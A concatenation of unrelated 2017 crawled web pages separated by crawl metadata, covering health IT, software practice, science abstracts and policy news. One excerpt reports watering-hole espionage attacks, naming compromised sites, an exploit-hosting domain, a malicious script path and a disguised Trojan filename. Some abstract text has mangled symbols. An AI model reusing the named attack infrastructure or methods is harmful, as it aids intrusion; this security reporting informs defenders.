Your computer should now be free of the WindowsRecovery program. If your current anti-virus solution let this infection through, you may want to consider purchasing the PRO version of Malwarebytes Anti-Malware to protect against these types of threats in the future. | <urn:uuid:598b6843-8f2d-4bc1-94f7-dafb95d6c968> | CC-MAIN-2017-09 | https://www.bleepingcomputer.com/virus-removal/remove-windows-recovery | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170696.61/warc/CC-MAIN-20170219104610-00643-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.894214 | 2,647 | 2.53125 | 3 |
- Defense & Intelligence Back
- Advanced SolutionsBack
Our deployable solutions in predictive care has accelerated the development of genomics platforms and advanced precision medicine. The term “genomics” encompasses technologies from sequencing an individual’s DNA, to using informatics for data management, security and analysis. Our expertise in precision medicine centers around security, cloud computing, integration of genomic and clinical data, interoperability, and researcher tools to access genomic data.
There’s a need to scale the science of studying genomics and relate aspects of individual genetic variations to disease and health. Advancements in precision medicine will revolutionize outcomes in healthcare for all involved. Some possibilities include:
- Precision oncology will treat tumors based on genetic abnormalities that drive the cancer
- Pharmacogenomics will advance our understanding of how genetic variations effect a patient’s response to medications
- Rare disease diagnosis will find and identify new mutations with whole genome scans
- Pre-disposition scans will find diseases through gene abnormalities before they strike
- Risk-adjusted screening will reduce unnecessary tests based on your genetic risk
Learn how precision medicine is advancing disease treatment & prevention.
What is precision medicine and why is it important to the future of healthcare?
Find answers through our precision medicine infographic. | <urn:uuid:54ba2a4d-326d-431d-949b-21db2ecfff64> | CC-MAIN-2017-09 | https://www.leidos.com/health/precision-medicine?host=h | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170992.17/warc/CC-MAIN-20170219104610-00167-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.855319 | 260 | 2.71875 | 3 |
The Pareto principle states that 80 percent of outcomes can be attributed to 20 percent of the possible causes of a given event. Also known as the 80-20 rule, it's relevant to almost every field of human endeavor.
In the field of software development, the principle can be summarized by saying that most problems are caused by a small number of bad coding practices. Eliminate them and your work will be very much easier and more productive.
These 10 coding practices are the worst culprits.
1. Typos in Your Code
These are surprisingly common, and they are maddening because they have nothing to do with your programming skill. Even so, a misspelled variable name or function name can wreak havoc on your code. What's more, they may not be easy to spot.
What's the solution? Working in a good integrated development environment (IDE) or even a programmer-specific text editor can reduce spelling errors significantly. Another thing you can do: Deliberately choose variable and function names that are easy to spell and, therefore, easy to spot when they have been misspelled. Avoid words such as receive, which easily be misspelled receive without being obvious.
2. Failing to Indent or Format Your Code
Indenting and otherwise formatting your code makes it easier to understand at a glance and, therefore, spot mistakes. It also makes it far easier for other people to maintain your code, as it's presented in a consistent fashion.
If you use an IDE that doesn't automatically format your code, consider running it through a code beautifier such as Uncrustify, which will format it consistently according to the rules you configure.
3. Failing to Modularize Your Code
It's good coding practice to write functions that do one thing and one thing only. That helps keep them short and, therefore, easy to understand and maintain. Long functions have many possible paths through them, making them much harder to test.
A good rule of thumb: One function should occupy no more space than a single screen. Another one: If it has 10 or more "if" statements or loops, then it's too complicated and should be rewritten.
4. Letting Your IDE Lull You Into a False Sense of Security
IDEs and other tools that provide code completion are fantastic for productivity. They suggest variables and other things based on what is in scope, given what you have already typed. But there's a danger with this type of tool - you can pick something because it looks like what you expect without taking the necessary effort to ensure that it's exactly what you want. Essentially, the tool does the thinking for you, when you in fact are responsible for making sure that the thinking is right.
There's a fine line to be drawn, though. Code completion tools can help eliminate errors such as typos and increase productivity, but they can also introduce "code completion" errors if you don't stay on the ball.
5. Hard-Coding Passwords
It's tempting to hard-code a secret account and password so you can get into your system later. You know you shouldn't do this - yes, it's highly convenient, but it's also highly convenient for anyone who gets access to the source code.
The real problem is that a hardcoded password will eventually become more widely known that you had intended. That makes it a huge security risk, not to mention a highly inconvenient fix.
6. Failing to Use Good Encryption to Protect Data
Sensitive data needs to be encrypted as it travels over the network, because it's vulnerable to interception when it does so. It's not just a good idea; it's a regulatory requirement, if not the law.
That means sending data in the clear is a "no no." It also rules out using your own encryption or obfuscation scheme as well. Writing your own secure encryption system is hard - just look at what happened with WEP - so use a proven industry standard encryption library and use it correctly.
7. Optimizing Code Prematurely
Legendary programmer Donald Knuth once said, "Programmers waste enormous amounts of time thinking about, or worrying about, the speed of noncritical parts of their programs, and these attempts at efficiency actually have a strong negative impact when debugging and maintenance are considered."
Being clever with your code may make it run infinitesimally faster, but it makes it far harder to debug and maintain. A better strategy: Write your code clearly, then get to work in any parts that really need optimizing in order to improve performance.
8. Failing to Think Ahead
What's your project for, how much will it be expected to scale, how many users will it have and how fast must it run? The answers to these questions may not be available - but if you fail to make estimates, then how can you choose a suitable framework for developing the application that will be able to meet these requirements?
[ Analysis: Why Software Testing Can't Save You From IT Disasters ]
Twitter provides a good example of the problems you encounter if you underestimate future requirements. Twitter had to abandon Ruby on Rails and rewrite much of its code using Scala and other technologies because the Ruby code, as originally architected, simply couldn't scale to keep up with Twitter's fast-growing user base.
9. Adding People to Make Up for Lost Time
Almost every software project falls behind schedule. Adding people to the project to get it back on track sounds like a good idea in theory, but it's a common mistake. In fact, adding new people to a project is almost always results in a drop in overall productivity.
10. Using Known Bad Time Estimates
At the same time, it's important to avoid the temptation to imagine that you'll catch up with your schedule later without adding people to the project. If you fall behind schedule, it's because your time estimates were wrong. That means you need to make a new estimate of the length of the project, not blindly stick to an estimate that has already been proven wrong.
Read more about developer in CIO's Developer Drilldown.
This story, "10 Bad Coding Practices That Wreck Software Development Projects" was originally published by CIO. | <urn:uuid:190446ac-25b7-4a32-a8ce-f8a6e9180ce1> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2369322/software/10-bad-coding-practices-that-wreck-software-development-projects.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171932.64/warc/CC-MAIN-20170219104611-00043-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.945867 | 1,276 | 3.171875 | 3 |
Joseph Schumpeter, one of my favorite economists, coined the term "creative destruction" to describe the way in which innovation disrupts how things are done, and in the process, gives rise to new companies and new ways of operating. What's been called the Internet of Things -- the rapidly proliferating connection of all devices, sensors, machines and people -- is set to create disruption on a huge scale. This ups the ante significantly for analytics and real-time computing.
The driverless car is an excellent example as a disruptive innovation that impacts both consumers and businesses. For instance, when driverless cars become common, not only will they change commuters' experiences, they are expected to lessen the incidence of traffic accidents, improve the density of road use, smooth subsequent planning for maintenance, ease long-term planning for other transportation systems such as light rail, and much more. What makes all of this possible? The Internet of Things' flow of data between the cars, street lights, people, radios, cellphones, etc, And the real-time analytics that makes the important real-time decisions for the driverless cars.
It is only human nature. Once consumers and businesses have a taste of the Internet of Things and real-time analytics benefits, they'll want more of it. In fact, it has been said that along with the influx of data, by 2017 more than 50 percent of analytics implementations will make use of event data streams generated from instrumented machines, applications, and/or individuals. How can companies keep up with this real-time analytics demand? By changing how analytics is currently done to fit the new digital need, including:
- Analytics of vast amounts of data will increasingly be performed in the cloud or on devices themselves.
- New ways of distributing analytics will be used. Currently, a lot of analytics applications are large and run on servers. In the next few years we'll start seeing more and more limited and targeted "apps" running on small sensors embedded in devices. These will have to be updated remotely, as it will be too expensive to distribute the analytics any other way.
- The analytics conducted on servers and laptops today will start being performed on sensors and chips, which will allow decisions to be made far from where the code was originally written. For example, the personal devices that monitor and analyze individuals' health or the success - or otherwise - of their workout offer real time, minute-to-minute performance insights and suggestions, telling their wearer how to achieve the fitness goals they've set. We'll increasingly see those immediate insights and recommendations extended to many more areas of life and business.
Important to note is that for businesses to jump into the Internet of Things and truly take advantage of the real-time analytics benefits it can offer, organizations must look beyond the existing data and analytics and approach a larger strategy to enable success. Elements of the strategy should involve test and learn pilots, a data governance program, and a technology infrastructure that supports mobile and big data.
If you think that the world of driverless cars, robots carrying out maintenance in hazardous locations like oilrigs, or advertising that reads and responds to individuals' unique facial expressions sound like science fiction, it's time to think again. These are all developments happening today and they're prompting a new exciting phase in analytics that needs to be addressed now. Those that embrace the data will be more likely to be surfing on top of the wave of creative destruction, instead of having it crash down on top of them. | <urn:uuid:1dcad73b-85cf-4573-a8bc-73b5b9659714> | CC-MAIN-2017-09 | http://www.computerworld.com/article/2475818/business-intelligence/the-internet-of-things-and-real-time-analytics.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172447.23/warc/CC-MAIN-20170219104612-00219-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.951502 | 709 | 2.671875 | 3 |
Professor of Economics
Lincoln University, New Zealand
Social Scientist, GNS Science and Director of the Joint Centre for Disaster Research
Massey University, New Zealand
Dr. Thomas Pratt
US Geological Survey, Department of the Interior
Canterbury Department of Emergency Management
Earthquakes in the central and eastern U.S. are rare (low probability) events, but the M5.8 Virginia earthquake in 2011 reminded us that earthquakes can and will occur where least expected. Every earthquake has some consequences and fortunately, the Virginia event was centered far away from any urbanized areas where it could have caused significant damage and injuries. This was not the case for the Canterbury region of New Zealand. The low probability earthquakes that struck in 2010 and 2011 had dire consequences - the M5.5 to M6.3 earthquakes destroyed most of the urban center of Christchurch, with losses totaling 20% of New Zealand’s GDP, killed 185 and injured over 6,000.
This session spotlights the lessons learned in New Zealand. Experts from there who have both personal and professional roles contending with the immediate and long-term consequences of the Canterbury earthquakes will share their real-life experiences. Session discussion will put these lessons into a U.S. context, touching on what could happen if the Virginia earthquake occurred closer to an unsuspecting central or eastern U.S. city and how we might become more resilient physically and economically, not just to the hazards posed by local earthquakes, but by earthquakes worldwide.
- What worked and didn’t work during the response and recovery phases of a major disaster in an environment very similar to that in many moderate-sized US cities,
- What nature can deliver and the potential impacts in a typical, long-lived earthquake sequence,
- Earthquake hazard forecasts regionally and globally. | <urn:uuid:2b0bd57c-bed7-49bb-9e59-851fa40a17d9> | CC-MAIN-2017-09 | https://govsecinfo.com/events/govsec-2014/sessions/wednesday/slp2-3.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172447.23/warc/CC-MAIN-20170219104612-00219-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.948683 | 369 | 2.78125 | 3 |
Durech J.,Charles University |
Kaasalainen M.,Tampere University of Technology |
Herald D.,International Occultation Timing Association IOTA |
Dunham D.,KinetX, Inc |
And 8 more authors.
Icarus | Year: 2011
Asteroid sizes can be directly measured by observing occultations of stars by asteroids. When there are enough observations across the path of the shadow, the asteroid's projected silhouette can be reconstructed. Asteroid shape models derived from photometry by the lightcurve inversion method enable us to predict the orientation of an asteroid for the time of occultation. By scaling the shape model to fit the occultation chords, we can determine the asteroid size with a relative accuracy of typically ∼10%. We combine shape and spin state models of 44 asteroids (14 of them are new or updated models) with the available occultation data to derive asteroid effective diameters. In many cases, occultations allow us to reject one of two possible pole solutions that were derived from photometry. We show that by combining results obtained from lightcurve inversion with occultation timings, we can obtain unique physical models of asteroids. © 2011 Elsevier Inc. Source
Tanga P.,French National Center for Scientific Research |
Carry B.,French National Center for Scientific Research |
Colas F.,French National Center for Scientific Research |
Delbo M.,French National Center for Scientific Research |
And 39 more authors.
Monthly Notices of the Royal Astronomical Society | Year: 2015
Asteroid (234) Barbara is the prototype of a category of asteroids that has been shown to be extremely rich in refractory inclusions, the oldest material ever found in the Solar system. It exhibits several peculiar features, most notably its polarimetric behaviour. In recent years other objects sharing the same property (collectively known as 'Barbarians') have been discovered. Interferometric observations in the mid-infrared with the ESO VLTI (Very Large Telescope Interferometer) suggested that (234) Barbara might have a bi-lobated shape or even a large companion satellite. We use a large set of 57 optical light curves acquired between 1979 and 2014, together with the timings of two stellar occultations in 2009, to determine the rotation period, spin-vector coordinates, and 3-D shape of (234) Barbara, using two different shape reconstruction algorithms. By using the light curves combined to the results obtained from stellar occultations, we are able to show that the shape of (234) Barbara exhibits large concave areas. Possible links of the shape to the polarimetric properties and the object evolution are discussed. We also show that VLTI data can be modelled without the presence of a satellite. © 2015 The Author Published by Oxford University Press on behalf of the Royal Astronomical Society. Source
Dunham D.W.,International Occultation Timing Association IOTA |
Herald D.,IOTA |
Timerson B.,IOTA |
Maley P.,IOTA |
And 4 more authors.
Proceedings of the International Astronomical Union | Year: 2016
For 40 years, the sizes and shapes of many dozens of asteroids have been determined from observations of asteroidal occultations, and over a thousand high-precision positions of the asteroids relative to stars have been measured. Some of the first evidence for satellites of asteroids was obtained from the early efforts; now, the orbits and sizes of some satellites discovered by other means have been refined from occultation observations. Also, several close binary stars have been discovered, and the angular diameters of some stars have been measured from analysis of these observations. The International Occultation Timing Association (IOTA) coordinates this activity worldwide, from predicting and publicizing the events, to accurately timing the occultations from as many stations as possible, and publishing and archiving the observations. Copyright © 2016 International Astronomical Union. Source
Braga-Ribas F.,Observatorio Nacional |
Sicardy B.,Observatoire de Paris |
Sicardy B.,University Pierre and Marie Curie |
Ortiz J.L.,Institute Astrofisica Of Andalucia Csic |
And 52 more authors.
Astrophysical Journal | Year: 2013
We present results derived from the first multi-chord stellar occultations by the transneptunian object (50000) Quaoar, observed on 2011 May 4 and 2012 February 17, and from a single-chord occultation observed on 2012 October 15. If the timing of the five chords obtained in 2011 were correct, then Quaoar would possess topographic features (crater or mountain) that would be too large for a body of this mass. An alternative model consists in applying time shifts to some chords to account for possible timing errors. Satisfactory elliptical fits to the chords are then possible, yielding an equivalent radius Requiv = 555 ± 2.5 km and geometric visual albedo pV = 0.109 ± 0.007. Assuming that Quaoar is a Maclaurin spheroid with an indeterminate polar aspect angle, we derive a true oblateness of , an equatorial radius of km, and a density of 1.99 ± 0.46 g cm-3. The orientation of our preferred solution in the plane of the sky implies that Quaoar's satellite Weywot cannot have an equatorial orbit. Finally, we detect no global atmosphere around Quaoar, considering a pressure upper limit of about 20 nbar for a pure methane atmosphere. © 2013. The American Astronomical Society. All rights reserved. Source
Sicardy B.,University of Paris Descartes |
Sicardy B.,University Pierre and Marie Curie |
Sicardy B.,Institut Universitaire de France |
Bolt G.,Craigie |
And 32 more authors.
Astronomical Journal | Year: 2011
Pluto and its main satellite, Charon, occulted the same star on 2008 June 22. This event was observed from Australia and La Réunion Island, providing the east and north Charon Plutocentric offset in the sky plane (J2000): X = + 12,070.5 ± 4 km (+ 546.2 ± 0.2 mas), Y = + 4,576.3 ± 24 km (+ 207.1 ± 1.1 mas) at 19:20:33.82 UT on Earth, corresponding to JD 2454640.129964 at Pluto. This yields Charon's true longitude L = 153.483 ± 0. ° 071 in the satellite orbital plane (counted from the ascending node on J2000 mean equator) and orbital radius r = 19,564 ± 14 km at that time. We compare this position to that predicted by (1) the orbital solution of Tholen & Buie (the "TB97" solution), (2) the PLU017 Charon ephemeris, and (3) the solution of Tholen et al. (the "T08" solution). We conclude that (1) our result rules out solution TB97, (2) our position agrees with PLU017, with differences of δL = + 0.073 ± 0. ? 071 in longitude, and δr = + 0.6 ± 14 km in radius, and (3) while the difference with the T08 ephemeris amounts to only δL = 0.033 ± 0. ? 071 in longitude, it exhibits a significant radial discrepancy of δr = 61.3 ± 14 km. We discuss this difference in terms of a possible image scale relative error of 3.35 × 10-3in the 2002-2003 Hubble Space Telescope images upon which the T08 solution is mostly based. Rescaling the T08 Charon semi-major axis, a = 19, 570.45 km, to the TB97 value, a=19636 km, all other orbital elements remaining the same ("T08/TB97" solution), we reconcile our position with the re-scaled solution by better than 12 km (or 0.55 mas) for Charon's position in its orbital plane, thus making T08/TB97 our preferred solution. © 2011. The American Astronomical Society. All rights reserved. Source | <urn:uuid:06a6fd2d-4ba2-468e-978d-38ef99450c5c> | CC-MAIN-2017-09 | https://www.linknovate.com/affiliation/euraster-450509/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172447.23/warc/CC-MAIN-20170219104612-00219-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.867678 | 1,742 | 2.890625 | 3 |
In recognition of National Hurricane Preparedness Week, the USGS has initiated specific actions to prepare for the impending hurricane season that runs June through October.
One specific action is the use of geodressing. When Hurricane Katrina left New Orleans under water, conventional road maps became almost useless tools to locate those in distress. "Geoadressing," using GPS, satellite, and other remotely obtained geospatial information, proved crucial for search and rescue operations. The USGS has established a Geospatial Information Response Team (GIRT) whose purpose is to ensure streamlined and responsive coordination and timely availability of geospatial information for effective Gulf and East coast storm response for emergency responders, land and resource managers, and scientific analysis. The GIRT is responsible for putting in place and monitoring procedures for geospatial data acquisition, processing, and archiving; data discovery, access, and delivery; anticipating geospatial needs; and other related geospatial products and services. During national emergencies, the USGS Geospatial Information Response Team provides post-event airborne imagery within 24 hours upon request of the Federal Emergency Management Agency (FEMA).
Scientific research at the USGS related to hurricanes includes: 1) radar-tracking of migratory birds during the fall migration period to assess possible effects of hurricanes on migration patterns; 2) studying global climate change and effects of sea-level rise on coastal wetlands and forests; 3) predicting the persistence of coastal wetlands to global climate change effects, including effects of altered temperature and atmospheric carbon dioxide; 4) biogenic accretion through surface-root production in coastal wetlands and implications for elevation change relative to sea-level rise; 5) tracking and visualization of coastal restoration projects; 6) hurricane modeling including models of spread of invasive species via hurricane-force winds. | <urn:uuid:c7a89b76-0176-4951-996d-6002fa38d296> | CC-MAIN-2017-09 | http://www.govtech.com/geospatial/USGS-has-Science-that-Weathers-the.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174159.38/warc/CC-MAIN-20170219104614-00091-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.892761 | 361 | 3.515625 | 4 |
Researchers twist light to send data at 2.56 terabits/sec
- By Henry Kenyon
- Jun 26, 2012
Researchers have developed a light-based method to transmit data at rates up to 2.56 terabits/sec. The new approach opens the possibility of high-speed satellite communications, short-range free-space terrestrial links, and potential adaptation in fiber-optic systems.
The work of a multinational team of scientists led by the University of Southern California, the process uses eight beams of light twisted into a DNA-like helical stream through the use of light-bending “phase holograms.”
Each individual beam has its own twist, which can be encoded with data to effectively serve as an independent data stream, similar to individual channels on a radio, USC scientists said in a statement.
Broadband cable has a maximum data rate of 30 megabits/sec. The twisted light system is capable of moving more than 85,000 times more data, USC officials said.
“You’re able to do things with light that you can’t do with electricity,” said Alan Willner, a professor of electrical engineering at USC’s Viterbi School of Engineering. Willner is also the author of a related article about the research published in Nature Photonics on June 24. He said the USC team did not invent the beam twisting process, but it did ramp it up to terabit levels. “That’s the beauty of light; it’s a bunch of photons that can be manipulated in many different ways at very high speed,” he added.
The technology, the result of research funded by the Defense Advanced Research Projects Agency as part of its Information in a Photon, or InPho, program, was successfully demonstrated in a laboratory setting that simulated satellite communications in space.
The research team included members from the United States, China, Pakistan and Israel. | <urn:uuid:fc6807a1-4611-48cb-be87-e7dd02253543> | CC-MAIN-2017-09 | https://gcn.com/articles/2012/06/26/twisted-light-breaks-data-speed-record.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171251.27/warc/CC-MAIN-20170219104611-00387-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.944871 | 403 | 2.546875 | 3 |
This article appeared in Ed Tech magazine.
As more colleges shift to online courses and exams, the potential for cheating grows. But new technology is on the rise that authenticates students' identities with something that can’t be shared — their bodies.
Colleges are using biometric authentication to leap past the days of PINs and passwords.
With the inclusion of a fingerprint scanner on the Apple iPhone 5S in 2013 and Samsung’s Galaxy S5 in 2014, a key biometric technology has already gone mainstream. Using this and other unique body identifiers as authentication, there are a variety of ways biometrics can be implemented to change or augment security measures.
Biometric Signature ID, a Lewisville, Texas, company, has found some success in higher education through its eponymous handwriting and gesture-based security program.
BioSig-ID builds a profile for each student based on how they write, sign or gesture using a pen or mouse. This profile is used for comparison when the student takes an online test.
Another authentication feature of the program asks students to memorize a sequence of clicks made on an image. In one example, an image of a kitchen had three apples. Students would click on each apple in a sequence. The image is then tilted and students would click on those same apples again at a different angle.
Security in use at Georgia Southern University takes a different approach to biometrics — one generally associated with private security systems and the military.
While waiting in line at the school’s dining halls, students forgo swiping the traditional plastic ID card, and instead look into an iris scanner for less than two seconds to confirm their identity. Implementing five such iris scanners at the university cost about $35,000, according to CR80 News, which covers campus identification and security technology.
The iris system has authenticated more than 375,000 transactions since being deployed in August 2013, CR80 News reports.
Mark Sarver, CEO of eduKan, a consortium of community colleges that offer online courses and degrees, says the group has been using biometric scanning to authenticate more than 10,000 students over the past three years. He told eCampus News that the technology has proved to be cost-effective and transparent to students.
The costs associated with certain biometric technologies can be a barrier to entry for some colleges, CR80 News reports. Faster iris scanners cost more, but prices fall with response time. The technology adopted by Georgia Southern reads irises in under two seconds, which is slower than other models, but just fine for those waiting in line.
Though many biometric technologies, such as fingerprint scanners, have been around for decades, their usage has been growing as the components become more prevalent and affordable. The incorporation of these technologies in higher education environments is a result of their growing acceptance, bolstered by a new movement in building securities to incorporate less invasive measures.
TO read the full article, click here
“People have been talking about this for decades as the future, but I think the technology is finally good enough and invisible enough that people will start to embrace it,” says Robert McCrie, a professor at John Jay College of Criminal Justice and the former director of the school’s Security Management Institute. | <urn:uuid:56afc9be-6544-406d-9819-88e69af3b966> | CC-MAIN-2017-09 | https://www.biosig-id.com/about/press-releases/147-biosig-id-featured-in-ed-tech-magazine-in-biometrics-we-trust | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170569.99/warc/CC-MAIN-20170219104610-00208-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.949988 | 675 | 2.625 | 3 |
Security experts are accustomed to direct attacks, but some of today’s more insidious incursions succeed in a roundabout way — by planting malware at sites deemed most likely to be visited by the targets of interest. New research suggests these so-called “watering hole” tactics recently have been used as stepping stones to conduct espionage attacks against a host of targets across a variety of industries, including the defense, government, academia, financial services, healthcare and utilities sectors.
Some of the earliest details of this trend came in late July 2012 from RSA FirstWatch, which warned of an increasingly common attack technique involving the compromise of legitimate websites specific to a geographic area which the attacker believes will be visited by end users who belong to the organization they wish to penetrate.
At the time, RSA declined to individually name the Web sites used in the attack. But the company shifted course somewhat after researchers from Symantec this month published their own report on the trend (see The Elderwood Project). Taken together, the body of evidence supports multiple, strong connections between these recent watering hole attacks and the Aurora intrusions perpetrated in late 2009 against Google and a number of other high-profile targets.
In a report released today, RSA’s experts hint at — but don’t explicitly name — some of the watering hole sites. Rather, the report redacts the full URLs of the hacked sites that were redirecting to exploit sites in this campaign. However, through Google and its propensity to cache content, we can see firsthand the names of the sites that were compromised in this campaign.
According to RSA, one of the key watering hole sites was “a website of enthusiasts of a lesser known sport,” hxxp://xxxxxxxcurling.com. Later in the paper, RSA lists some of the individual pages at this mystery sporting domain that were involved in the attack (e..g, http://www.xxxxxxxcurling.com/Results/cx/magma/iframe.js). As it happens, running a search on any of these pages turns up a number recent visitor logs for this site — torontocurling.com. Google cached several of the access logs from this site during the time of the compromise cited in RSA’s paper, and those logs help to fill in the blanks intentionally left by RSA’s research team, or more likely, the lawyers at RSA parent EMC Corp. (those access logs also contain interesting clues about potential victims of this attack as well).
From cached copies of dozens of torontocurling.com access logs, we can see the full URLs of some of the watering hole sites used in this campaign:
- http://rocklandtrust.com (Massachusetts Bank)
- http://ndi.org (National Democratic Institute)
- http://www.rferl.org (Radio Free Europe / Radio Liberty)
According to RSA, the sites in question were hacked between June and July 2012 and were silently redirecting visitors to exploit pages on torontocurling.com. Among the exploits served by the latter include a then-unpatched zero-day vulnerability in Microsoft Windows (XML Core Services/CVE-2012-1889). In that attack, the hacked sites foisted a Trojan horse program named “VPTray.exe” (made to disguise itself as an update from Symantec, which uses the same name for one of its program components). Continue reading → | <urn:uuid:b3bb50c5-b5e7-4a88-9ce1-3b8edf95aa08> | CC-MAIN-2017-09 | https://krebsonsecurity.com/tag/cve-2012-1723/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00084-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.94302 | 714 | 2.578125 | 3 |
The U.S. Federal Communications Commission will consider letting passengers use cellular services on airplanes, breaking with a ban that has been in place for years.
At a meeting set for Dec. 12, the FCC will consider a Notice of Proposed Rulemaking to allow passengers to use mobile wireless services "via onboard airborne access systems," according to an agenda for the meeting that was released Thursday.
Both the FCC and the U.S. Federal Aviation Administration have long restricted the use of both cellphones and other electronic devices in flight because of concerns about interference with navigation and other onboard electronics. The FAA recently eased regulations on using some electronic devices during takeoff and landing.
The FCC proposal would allow the use of mobile services that are now banned in flight. That would mean passengers could get online and potentially make voice calls over cellular services and not just the in-flight Wi-Fi provided on many flights today. They would access the cellular services via equipment on the plane rather than cellphone towers on the ground. Airlines could still restrict voice calls in flight, just as the major U.S. airlines now ban Internet voice calls via Wi-Fi.
"Today, we circulated a proposal to expand consumer access and choice for in-flight mobile broadband," FCC Chairman Tom Wheeler said in a statement. "Modern technologies can deliver mobile services in the air safely and reliably, and the time is right to review our outdated and restrictive rules. I look forward to working closely with my colleagues, the FAA, and the airline industry on this review of new mobile opportunities for consumers."
The plan wouldn't allow cellular use during takeoff and landing, but only above 10,000 feet, according to the FCC.
While the FAA has regulated electronics devices to protect aviation equipment, the FCC has banned the use of cellular radios in flight because they can harm cellular networks on the ground. If the FCC follows through with its plan, the FAA would still have to approve the small cellular base stations for installation on planes.
If the FCC commissioners agree on Dec. 12 to move the proposal forward, it will then go through periods for public comment and response and probably would not take effect for several months or more. | <urn:uuid:d3ac1041-75d6-45ca-9362-997e47867ee8> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2172123/smb/fcc-proposes-allowing-in-flight-cellular-use-on-airplanes.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00260-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.963095 | 438 | 2.5625 | 3 |
The next innovation in health care may come from Silicon Valley.
With Google, Apple and Samsung exploring how to incorporate health IT features into wearable devices, patients may soon provide information to doctors through devices such as smartwatches that can measure and transmit biometric data. Health IT wearables will open a digital conduit so that, for instance, doctors can more readily monitor patients with chronic conditions while also cutting down the need for office visits.
"What's going to accelerate health as much as anything is consumer devices having [medical] features on them so that we're continuously collecting this data over a large population of patients," said Dr. Leslie Saxon, a cardiologist at the University of Southern California Keck School of Medicine and executive director and founder of the USC Center for Body Computing.
Companies like Apple, Google and Samsung "have the ability to, unlike medical companies, create continuous engagement with their users."
While none of these companies has health IT wearables generally available, each has shown interest in the market. Apple executives met with the U.S. Food and Drug Administration in December to discuss mobile medical applications, according to the agency's public calendar. The company is rumored to be developing a smartwatch with health IT functions and has hired staff with backgrounds in medical sensor technology.
The FDA's calendar also noted that Google last year met with agency representatives including the adviser on mobile medical applications and staff who regulate ocular and cardiovascular devices. Additionally, Google developed and is testing a prototype contact lens that can help diabetics monitor their blood sugar by measuring glucose levels in tears.
Samsung and the University of California, San Francisco, recently established a lab on the school's campus to test and validate medical sensors and digital health technologies.
"We are now seeing a transition to companies thinking about these [devices] in a much more rigorous way, that they are going to be used for maintaining wellness or treating disease," said Dr. Michael Blum, the associate vice chancellor of informatics at the UCSF School of Medicine and the director of the school's Center for Digital Health Innovation.
The first generation of wearable devices from companies like Fitbit and Jawbone collect information that people would find interesting, like the number of steps walked, but have somewhat limited use from a health perspective, said Blum, who is a cardiologist.
"They were based on very little science," Blum said. "They were really based on how can we build a device and make it a marketing success." These devices and the technology they use were never validated for accuracy and the metrics they measured were never scientifically proven to have wellness benefits, Blum noted.
For wearable devices to be accepted by physicians, they need to be "designed with the kind of 99-plus percent precision" that is expected from their clinical counterparts, Blum said. Without validation of the devices' ability to take accurate readings, patients and care providers can't rely on them and "they end up in a drawer," Blum said.
But physicians would welcome a new generation of scientifically valid wearables, since the high volume of data generated by such devices may lead to new ways of identifying disease symptoms, measuring wellness and discovering nontraditional vital signs, said Blum.
Most people spend their time outside of hospitals and wearable devices will give doctors data on how lifestyle affects a person's health, said Dr. Michael Docktor, a gastroenterologist at Boston Children's Hospital.
Given the huge installed base that the leading tech companies have, even limited use of wearables among their users could create useful data sets.
"You don't need much adoption or much continuous use to create a database that doesn't exist for medicine anywhere," USC's Saxon said. "If you have the largest database of 18-year-olds' heart rates and blood sugar and activity, you've got a very powerful data set. A couple of hundred million people all over the world is really compelling."
As keen as some doctors are on wearable devices, however, the health care system isn't ready to incorporate the technology. Care providers are focused on implementing and learning electronic-health-record (EHR) software, Blum said. When EHR systems are established, they're designed around storing data generated from a patient visit, not information from a wearable device, he added.
The data analysis component of health IT is still developing, said Blum. Don't expect to upload wearable data to Google or Apple's cloud for analysis, he said.
"The vision is the doctor is sitting waiting for all this, and the doctors aren't. They're running around with their hair on fire trying to do what they do right now," Blum said.
Eventually, companies that specialize in handling high-volume data will partner with the medical community to better understand the health care ecosystem and offer analysis applications.
"It's kind of a little naA-ve to think that a company that's developing new sensor technology [is] also going to have the wherewithal to develop analytics for it," Blum said. "And whether they're going to have the scientific insights and background to know what's relevant and then figure out what should get pushed to the clinician."
Some physicians and software developers may opt to build applications for specific medical conditions that push relevant data to clinicians, Docktor of Boston Children's Hospital said. "I think it's going to be people independently hacking the system," he said.
Google, in particular, will "really make a compelling argument for hacking cool solutions for medical applications." Docktor added that the company already followed this route by making an SDK (software development kit) available for its Glass headset.
Meanwhile, every party involved in health IT realizes that data security "is critically important," said Blum. The challenge is keeping data secure while preserving its "fluidity" so it can be added to larger databases and used to advance medicine.
How, and if, IT companies have to comply with the Health Insurance Portability and Accountability Act (HIPAA), a U.S. government regulation that deals with health data security and privacy and how the information is exchanged, depends on what products they develop.
To avoid having to develop HIPAA-compliant services, IT vendors may make people responsible for managing and sharing their data instead of developing a physician portal, Docktor said.
"I imagine -- and I think it skirts the HIPAA issue -- but if a patient is sending the data directly to their physician it kind of gets around it," he said. "How [data] is transmitted to the physicians and what we do with that data is really in its early days, and I don't know who's going to win there."
